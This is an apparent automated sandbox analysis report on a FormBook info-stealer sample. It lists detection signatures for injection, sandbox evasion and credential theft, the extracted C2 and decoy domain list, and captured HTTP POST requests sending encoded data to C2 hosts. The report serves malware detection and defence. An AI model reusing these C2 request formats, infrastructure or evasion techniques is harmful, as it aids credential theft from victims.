Windows Analysis Report
PO#12108997.exe

Overview

General Information

Sample Name: PO#12108997.exe
Analysis ID: 626541
MD5: 5f6801fb007ede49a68943ef905b54c6
SHA1: a01e755201a0f7caec5b123db1d26776948d33c4
SHA256: ce5e4278243ecbcd11f46db7a76dc39f0ce091914bf298af73fb4e1e5391441b
Tags: exeformbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.mybenefitassist.com/p12s/"], "decoy": ["kaylaspann.com", "miumiu-turkey.com", "carlomarlo.com", "roucee.com", "lizardheartmall.xyz", "cromen.finance", "harum4d.life", "codynolovenft.com", "mbughwiniadventure.com", "bodybreathintelligence.com", "dewajitu88.club", "65ur345fg.xyz", "merion.art", "crown-regroup.com", "lonazao.space", "expresspatriotsammoandguns.com", "mediapopuli.net", "stoppie.site", "nyajuicebar.com", "mackeyfi8.club", "bumesta.com", "theconttcom.com", "hgsiftaradogru.com", "bliss-togo.com", "wellnesstogether.one", "mortgagestoday.net", "chadmansfieldhomeloans.com", "gura.world", "energyhealingwithmark.com", "ifrassi.com", "actionyardgames.com", "azndmeapp.com", "brandtbusinessservices.net", "lasemdrabat.com", "waterdogsupply.com", "crosscitypest.com", "tombstoned-webapp.com", "mfeybteqb.xyz", "thefunfun3studio.space", "fs-motor.net", "evakonetworks.com", "faru.store", "procopiospizzamenu.com", "intobet543.com", "villefry.com", "courtkristineartistry.com", "mikecartonly.com", "usketoout.site", "nookmaniabuyacnhitems.com", "bygym.xyz", "tyz.world", "natwestcryptoinvestment.com", "aaeedahsbangles.com", "globalhealthindex.com", "facialmate.com", "cognitohealthcareeducation.com", "iyziw.com", "denbos.xyz", "madurababe.net", "weshoppe.net", "theclotheslibrary.com", "bysarahdeshmeh.com", "williamsonortho.com", "codegreenagroallied.com"]}
Multi AV Scanner detection for submitted file
Source: PO#12108997.exe Virustotal: Detection: 34% Perma Link
Source: PO#12108997.exe ReversingLabs: Detection: 61%
Yara detected FormBook
Source: Yara match File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: PO#12108997.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.0.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.vbc.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: PO#12108997.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: PO#12108997.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ActivityCont.pdb source: PO#12108997.exe
Source: Binary string: cmmon32.pdb source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ActivityCont.pdbh source: PO#12108997.exe
Source: Binary string: cmmon32.pdbGCTL source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: vbc.pdb source: cmmon32.exe, 00000011.00000002.502692331.0000000004705000.00000004.00000800.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4x nop then pop esi 4_2_00417311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4x nop then pop edi 4_2_0040E481
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop esi 17_2_007D7311
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop edi 17_2_007CE481

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 188.114.97.10 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tyz.world
Source: C:\Windows\explorer.exe Domain query: www.madurababe.net
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.mybenefitassist.com/p12s/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA HTTP/1.1Host: www.tyz.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd HTTP/1.1Host: www.madurababe.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.97.10 188.114.97.10
Source: Joe Sandbox View IP Address: 188.114.97.10 188.114.97.10
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.tyz.worldConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.tyz.worldUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tyz.world/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 30 49 71 32 49 76 78 63 79 5a 38 6b 6a 6e 4f 38 75 5a 34 4e 7e 36 77 67 6d 6b 73 58 28 47 53 73 71 55 49 71 6b 6a 41 56 77 34 31 45 46 34 69 46 41 50 7a 32 32 61 36 64 6e 62 66 51 34 36 51 34 37 68 45 78 59 6a 54 68 38 47 34 54 65 34 79 76 74 53 31 4e 38 56 6f 6c 35 6f 58 64 56 6e 39 55 71 64 53 56 36 48 33 49 43 77 53 4f 67 34 63 73 68 49 4c 46 53 47 4b 70 48 52 7a 57 6c 6c 63 41 66 64 62 48 74 4b 75 30 63 31 41 6c 59 44 66 54 6d 33 46 47 30 39 4a 4e 75 48 36 30 66 58 67 51 46 31 38 43 62 50 65 31 6c 76 77 37 46 49 6d 4f 4d 34 37 42 34 67 43 48 36 65 4d 56 67 74 78 5f 45 4f 42 69 56 52 58 4b 64 67 66 30 6c 33 37 53 36 42 54 70 39 32 32 5f 68 64 6f 78 4e 6d 43 55 4e 43 76 38 30 37 4d 4d 47 57 44 51 4d 54 48 75 74 66 77 75 62 5a 56 63 4b 43 64 48 72 47 52 46 50 51 73 67 71 73 78 53 46 43 4a 4c 63 49 65 41 31 36 28 65 47 48 37 55 6e 57 79 4b 68 38 6c 5f 39 55 56 44 73 4d 37 72 4e 52 38 33 72 42 57 46 6f 46 75 56 72 52 71 79 33 68 45 36 78 52 68 6e 4c 6c 28 69 32 6a 32 37 55 66 4d 75 44 51 71 38 62 55 47 42 42 6d 77 5f 61 33 47 53 56 41 47 51 56 41 57 6e 64 72 74 37 77 7a 37 4e 49 5f 42 62 69 59 6b 61 7e 65 47 48 57 6b 73 5a 7a 35 38 71 55 51 7a 53 57 76 74 47 75 65 59 73 4a 6a 4e 44 35 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3f=0Iq2IvxcyZ8kjnO8uZ4N~6wgmksX(GSsqUIqkjAVw41EF4iFAPz22a6dnbfQ46Q47hExYjTh8G4Te4yvtS1N8Vol5oXdVn9UqdSV6H3ICwSOg4cshILFSGKpHRzWllcAfdbHtKu0c1AlYDfTm3FG09JNuH60fXgQF18CbPe1lvw7FImOM47B4gCH6eMVgtx_EOBiVRXKdgf0l37S6BTp922_hdoxNmCUNCv807MMGWDQMTHutfwubZVcKCdHrGRFPQsgqsxSFCJLcIeA16(eGH7UnWyKh8l_9UVDsM7rNR83rBWFoFuVrRqy3hE6xRhnLl(i2j27UfMuDQq8bUGBBmw_a3GSVAGQVAWndrt7wz7NI_BbiYka~eGHWksZz58qUQzSWvtGueYsJjND5A).
Source: global traffic HTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.tyz.worldConnection: closeContent-Length: 148780Cache-Control: no-cacheOrigin: http://www.tyz.worldUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tyz.world/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 30 49 71 32 49 72 46 49 30 70 6f 35 78 42 7e 5f 70 5a 6f 46 76 4c 42 39 6b 58 59 66 34 56 76 56 6e 6b 6b 36 6b 6d 4a 53 39 63 78 4a 54 6f 53 46 51 39 62 78 77 36 36 65 6c 62 66 52 70 72 74 4e 37 79 55 35 59 68 28 66 38 47 77 4d 51 66 43 6d 74 69 30 4e 38 31 74 51 28 70 32 50 56 68 30 38 71 37 4c 4b 39 48 4c 49 49 6b 7e 51 6c 5a 73 33 32 35 48 77 4d 6d 6d 67 46 52 62 54 6c 31 78 35 65 5f 6e 68 71 4c 79 32 57 6a 6f 2d 55 67 48 33 73 45 55 58 78 73 35 4b 72 46 48 71 62 30 55 63 47 30 39 69 59 4e 32 30 6f 5f 6f 35 41 4c 7e 77 49 4d 72 30 36 77 65 54 36 59 6f 6a 34 76 31 71 4f 70 42 51 53 6b 76 67 57 78 72 32 67 45 69 58 7e 44 4c 2d 79 57 47 51 7e 70 73 51 4b 31 57 64 4f 45 71 37 71 75 67 42 45 44 37 63 55 7a 57 58 67 76 45 32 53 34 6c 7a 4e 46 35 55 35 58 78 64 4f 56 31 42 79 73 77 2d 48 43 4a 66 58 62 47 6f 78 64 76 52 55 7a 28 36 74 46 44 4e 32 64 35 37 36 53 64 4c 76 73 50 71 4b 68 41 4e 6a 51 6e 79 73 32 43 53 38 43 33 48 7a 68 45 6e 73 69 4a 73 4c 6c 28 66 32 6d 44 55 58 4c 4d 75 4d 68 4b 76 58 58 75 4e 51 57 77 59 64 6a 61 55 63 54 53 41 56 41 75 6e 64 61 64 52 77 44 44 4e 45 4d 70 59 69 38 77 61 77 4f 47 48 44 55 73 4c 7a 5a 52 49 52 48 37 37 62 38 5a 67 6d 2d 6b 37 63 78 49 37 69 38 5a 48 65 36 49 68 6c 35 78 56 78 69 68 53 6e 5f 6d 6a 78 75 28 5a 59 4b 52 36 4c 6f 70 4a 67 30 37 59 42 51 4a 4a 51 76 39 59 71 49 36 35 67 78 4e 58 6c 30 74 7a 32 75 4d 4b 62 33 55 33 70 71 59 35 74 6d 46 6f 6d 36 52 38 54 41 37 38 6f 47 77 4a 56 4f 65 66 74 41 6e 79 64 4b 52 39 56 47 72 31 4e 66 76 42 41 52 56 6d 45 75 45 54 52 48 35 41 6f 30 33 4e 53 36 5a 46 30 4d 6d 52 47 72 55 65 5a 63 78 76 55 63 49 66 71 4c 44 77 76 44 59 78 68 48 35 70 5a 6c 74 75 28 4c 45 36 4e 52 47 63 72 32 67 65 6c 66 44 45 45 46 69 51 31 48 6a 57 65 69 6d 6a 56 52 74 75 59 2d 33 58 38 43 52 43 38 4c 4b 78 6d 4b 59 48 72 76 7a 78 28 78 7e 39 64 5f 71 70 50 65 30 50 33 6e 45 6d 50 74 4e 69 46 34 77 2d 43 56 46 2d 68 74 65 5a 69 6f 38 31 79 66 39 69 47 4b 41 57 41 79 33 50 41 30 34 54 75 31 28 4b 30 58 43 69 78 71 49 6f 67 4f 4f 56 52 57 45 5a 57 42 52 4c 79 41 59 69 39 38 54 30 63 37 73 54 41 53 6b 4a 30 65 65 70 43 56 7a 43 70 73 79 7a 28 6f 76 67 56 42 56 48 78 49 42 65 59 36 70 69 5a 5a 71 48 45 45 77 33 73 37 78 4f 53 7a 54 5f 34 70 42 68 74 57 37 37 6b 38 4d 74 6f 62 42 35 28 44 71 47 6f 4d 36 7a 39 56 54 77 38 54 74 5a 4e 42 67 4b 78 74 47 69 44 78 6d 4a 62 48 37 58 76 54 71 64 42 5a 42 50 5a 48 58 76 67 52 39 71 39 64 37 4f 56 73 6c 44 35 4d 4d 54 57 66 47 4e 37 66 50 75 56 52 69 74 76 32 58 5f 76 4b 4a 49 48 69 45 44 4a 49 77 5a 56 70 78 48 30 58 6e 31 59 54 32 4e 71 64 53 66 6b 41
Source: global traffic HTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.madurababe.netConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.madurababe.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.madurababe.net/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 6a 62 34 78 69 4d 54 78 62 34 71 31 36 62 38 45 67 6b 6d 64 38 44 4b 76 45 76 51 54 31 4b 70 54 6b 45 38 35 33 33 72 62 79 66 78 53 64 70 56 34 37 64 5a 79 50 30 58 33 67 52 77 45 56 4d 42 49 51 54 70 43 6d 33 5a 39 65 2d 39 39 61 4d 7a 34 51 6b 4b 33 68 31 6a 76 53 57 30 71 6f 77 54 66 47 70 7a 35 7e 6f 43 72 64 4d 63 34 74 63 36 41 67 6b 6d 37 6c 4c 45 59 49 6c 72 4b 72 43 38 7a 78 62 63 69 35 31 30 43 59 4b 41 36 38 55 77 36 50 62 28 72 6f 6b 76 48 6a 61 4c 65 66 6a 33 30 77 68 58 78 57 7a 73 57 6e 61 79 59 4d 6e 31 58 6d 58 6a 44 4f 59 64 76 4f 4c 6b 4d 56 56 4b 4b 4d 33 58 6f 34 77 6a 5f 41 78 52 4b 32 62 31 36 63 73 6a 62 43 4c 6e 69 61 4b 71 70 48 77 51 39 30 4b 6e 47 58 6b 41 33 47 30 70 68 61 79 4f 57 71 43 6a 69 64 42 61 76 73 4b 75 4b 38 36 33 54 41 42 72 6b 31 59 6b 78 5a 6f 75 37 64 77 31 42 34 6f 41 78 76 65 71 39 64 61 6c 44 43 48 6c 76 39 57 30 6b 59 46 54 41 75 6e 79 5a 66 44 6d 4b 49 44 45 32 4a 32 72 66 68 35 70 68 47 52 54 6c 68 42 39 6f 28 51 4b 37 33 31 42 43 63 45 42 37 61 61 76 45 39 39 73 4d 28 30 59 64 31 65 48 50 72 7a 43 77 28 6a 35 4b 38 42 62 43 75 75 78 34 78 68 34 49 7a 64 66 68 4a 6d 6f 66 4e 70 57 65 68 47 4b 48 54 45 73 4c 4a 31 69 75 68 4f 51 75 65 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3f=jb4xiMTxb4q16b8Egkmd8DKvEvQT1KpTkE8533rbyfxSdpV47dZyP0X3gRwEVMBIQTpCm3Z9e-99aMz4QkK3h1jvSW0qowTfGpz5~oCrdMc4tc6Agkm7lLEYIlrKrC8zxbci510CYKA68Uw6Pb(rokvHjaLefj30whXxWzsWnayYMn1XmXjDOYdvOLkMVVKKM3Xo4wj_AxRK2b16csjbCLniaKqpHwQ90KnGXkA3G0phayOWqCjidBavsKuK863TABrk1YkxZou7dw1B4oAxveq9dalDCHlv9W0kYFTAunyZfDmKIDE2J2rfh5phGRTlhB9o(QK731BCcEB7aavE99sM(0Yd1eHPrzCw(j5K8BbCuux4xh4IzdfhJmofNpWehGKHTEsLJ1iuhOQuew).
Source: global traffic HTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.madurababe.netConnection: closeContent-Length: 148780Cache-Control: no-cacheOrigin: http://www.madurababe.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.madurababe.net/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 6a 62 34 78 69 49 4f 4b 5a 70 65 5f 78 4f 74 6a 68 33 65 46 34 43 36 44 41 76 39 66 38 39 45 69 74 7a 74 6e 33 30 7a 66 35 36 55 4e 58 5a 46 34 76 76 41 36 51 30 58 30 78 68 77 46 65 73 45 6f 4f 7a 41 42 6d 32 63 6f 65 2d 31 2d 52 70 7e 79 55 6b 4c 78 7a 46 75 4b 55 57 67 78 6f 31 4b 33 47 4c 66 68 31 49 4f 72 43 49 77 36 6f 2d 43 62 70 46 37 71 72 61 38 52 4f 6e 72 70 72 77 6f 68 78 35 68 31 7e 30 34 41 50 5a 63 6c 35 55 67 42 46 71 33 6b 6d 51 48 36 36 74 4b 61 51 69 37 77 78 6c 4b 4f 4b 68 45 52 75 4b 71 65 4a 67 35 31 6a 6c 50 55 49 4a 74 64 4f 4e 41 63 52 6d 65 68 61 41 58 67 33 69 47 6b 4c 6b 31 62 35 49 77 6e 50 34 43 74 41 4c 58 4e 48 59 7a 72 44 68 4d 53 33 49 76 57 61 68 55 6d 44 47 4e 74 43 33 79 75 72 78 4f 74 41 52 71 51 32 5a 4f 37 72 37 58 68 44 44 47 4c 28 59 6b 53 55 49 75 6e 56 6d 49 34 28 50 59 36 75 66 61 66 57 35 46 74 47 54 52 72 7e 56 51 33 48 30 62 46 6f 57 4f 76 55 53 32 63 5a 43 52 34 59 52 62 5f 6c 35 70 38 4c 7a 72 73 68 42 39 6b 28 56 7e 64 32 42 42 43 63 57 35 6f 63 37 76 2d 71 4e 73 46 73 30 49 62 73 2d 37 66 72 79 6d 77 75 42 68 7a 39 79 4c 43 70 39 35 37 78 44 41 49 67 39 66 68 45 47 70 2d 4e 5a 7a 70 74 48 43 71 56 32 63 51 44 67 48 42 6b 66 39 6a 4f 70 33 72 59 6c 51 62 77 79 62 76 30 7a 75 46 56 4b 32 59 42 74 67 2d 69 34 72 30 72 45 73 53 49 36 32 4f 48 48 6f 35 54 52 31 41 39 77 6c 34 49 50 76 39 54 46 54 64 4e 36 58 31 75 33 72 4a 63 52 32 4d 6c 6d 4c 78 65 59 74 73 28 36 6a 55 7a 45 37 6c 59 45 6b 2d 4c 6f 42 47 54 32 7a 77 37 47 6e 57 38 45 74 53 39 2d 4a 69 38 6e 41 56 76 75 35 78 71 70 44 62 73 79 68 41 35 77 71 72 56 54 77 68 7a 34 4a 71 4d 37 66 77 6b 6b 55 31 30 33 38 42 73 56 30 41 73 68 33 5f 58 67 64 4a 57 66 47 30 33 35 77 33 67 70 79 42 53 48 64 33 4d 32 32 42 47 4a 39 30 6d 38 78 79 62 46 4d 35 73 57 74 53 69 5a 53 4b 76 63 4e 44 39 45 72 79 31 5a 6f 6d 78 79 55 52 71 4d 6f 41 6b 4c 76 4b 79 34 59 58 5a 49 4d 57 4a 53 6b 75 67 4a 55 4d 37 32 39 67 30 75 47 55 45 50 35 31 68 6a 28 76 58 6d 4e 55 4e 53 45 2d 52 35 45 43 69 36 4b 4f 42 64 50 6f 53 4a 64 30 61 47 35 61 6e 61 4d 46 31 58 77 46 31 6f 50 54 62 38 42 62 36 62 49 55 79 51 71 59 35 69 76 4a 6c 62 79 56 7a 49 58 4d 64 50 4a 42 39 36 49 77 35 56 30 72 66 35 62 44 6e 59 68 34 72 53 37 4c 38 4a 5a 36 6f 30 63 33 6c 31 70 33 74 38 73 53 7a 39 54 4b 33 4e 62 43 43 31 32 7a 4d 34 62 72 68 63 51 48 35 33 70 64 55 51 62 4d 74 67 62 56 52 36 6c 6b 72 61 6d 5a 46 71 6d 79 71 48 76 48 32 67 37 55 61 57 46 4e 55 6a 64 59 6c 49 30 37 32 64 58 6b 71 5f 75 75 55 7a 69 41 4a 71 7e 46 4e 64 38 39 52 45 52 68 46 39 4f 73 72 4c 63 4e 5a 52 53 6e 78
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 14 May 2022 09:55:46 GMTContent-Type: text/htmlContent-Length: 291ETag: "627e7264-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: PO#12108997.exe, 00000000.00000003.241230450.00000000062C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://en.w
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: PO#12108997.exe, 00000000.00000002.274185090.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.269352701.00000000062C0000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.257560730.00000000062CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: PO#12108997.exe, 00000000.00000002.274646249.0000000007582000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comB
Source: PO#12108997.exe, 00000000.00000003.250465612.00000000062C7000.00000004.00000800.00020000.00000000.sdmp, PO#12108997.exe, 00000000.00000003.250800660.00000000062C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comF
